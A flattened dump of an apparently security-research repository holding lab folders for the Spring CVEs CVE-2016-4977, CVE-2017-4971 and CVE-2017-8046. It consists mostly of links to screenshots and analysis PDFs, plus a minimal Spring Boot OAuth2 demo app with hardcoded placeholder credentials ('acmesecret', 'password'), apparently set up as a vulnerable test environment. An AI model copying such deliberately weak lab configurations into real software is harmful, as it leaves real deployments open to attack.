https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233138950.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233417903.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233417903.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010536341.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010536341.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010626981.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010626981.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010854625.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010854625.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010924079.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010924079.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011027192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011027192.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011825279.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011825279.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012116264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012116264.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012500083.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012500083.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012822337.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012822337.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013530679.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013530679.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013647485.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013647485.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013838006.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013838006.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014127250.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014127250.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014259943.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014259943.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014620317.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014620317.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014702074.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014702074.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.pdf -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/src/main/java/com/example/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer; 6 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer; 7 | import org.springframework.web.bind.annotation.RestController; 8 | 9 | @SpringBootApplication 10 | @RestController 11 | @EnableResourceServer 12 | @EnableAuthorizationServer 13 | public class DemoApplication { 14 | 15 | public static void main(String[] args) { 16 | SpringApplication.run(DemoApplication.class, args); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | security.oauth2.client.clientId:acme 2 | security.oauth2.client.clientSecret:acmesecret 3 | security.oauth2.client.authorized-grant-types:authorization_code,refresh_token,password 4 | security.oauth2.client.scope:openid 5 | security.oauth2.client.registered-redirect-uri:http://localhost 6 | security.user.password:password -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | security.oauth2.client.clientId:acme 2 | security.oauth2.client.clientSecret:acmesecret 3 | security.oauth2.client.authorized-grant-types:authorization_code,refresh_token,password 4 | security.oauth2.client.scope:openid 5 | security.oauth2.client.registered-redirect-uri:http://localhost 6 | security.user.password:password -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/com/example/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/com/example/DemoApplication.class -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/1.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/2.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/4.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194441152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194441152.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194733254.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194733254.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218200153046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218200153046.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201238194.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201238194.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201936295.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201936295.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202011507.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202011507.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202450134.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202450134.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203221151.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203221151.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203901093.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203901093.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203953533.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203953533.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204058653.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204058653.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204423476.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204423476.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204746269.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204746269.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205407984.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205407984.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205644634.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205644634.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205752547.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205752547.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210007792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210007792.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210058692.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210058692.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210510086.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210510086.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210700708.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210700708.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210826600.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210826600.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/t01d4c3b8e8b53a2fba.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/t01d4c3b8e8b53a2fba.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.pdf -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140900669.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140900669.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140952456.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140952456.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141130874.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141130874.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141757004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141757004.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141906222.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141906222.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142031222.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142031222.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142324101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142324101.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142345087.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142345087.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142403072.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142403072.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143536948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143536948.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143749562.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143749562.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143913364.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143913364.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144011160.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144011160.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144046479.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144046479.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144138429.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144138429.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144321822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144321822.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144405693.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144405693.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144455906.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144455906.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154218728.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154218728.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154242121.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154242121.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154309595.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154309595.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154343073.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154343073.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154922515.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154922515.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155012734.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155012734.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155828334.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155828334.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155904249.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155904249.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155949892.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155949892.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160152994.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160152994.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160229390.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160229390.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160352066.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160352066.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160446520.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160446520.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160527668.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160527668.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160715149.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160715149.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.pdf -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/accessing-data-rest.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'org.springframework.boot' version '2.4.2' 3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE' 4 | id 'java' 5 | } 6 | 7 | group = 'com.example' 8 | version = '0.0.1-SNAPSHOT' 9 | sourceCompatibility = '1.8' 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.springframework.boot:spring-boot-starter-data-jpa' 17 | implementation 'org.springframework.boot:spring-boot-starter-data-rest' 18 | runtimeOnly 'com.h2database:h2' 19 | testImplementation 'org.springframework.boot:spring-boot-starter-test' 20 | } 21 | 22 | test { 23 | useJUnitPlatform() 24 | } 25 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/Main.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/SpELTest.class: -------------------------------------------------------------------------------- 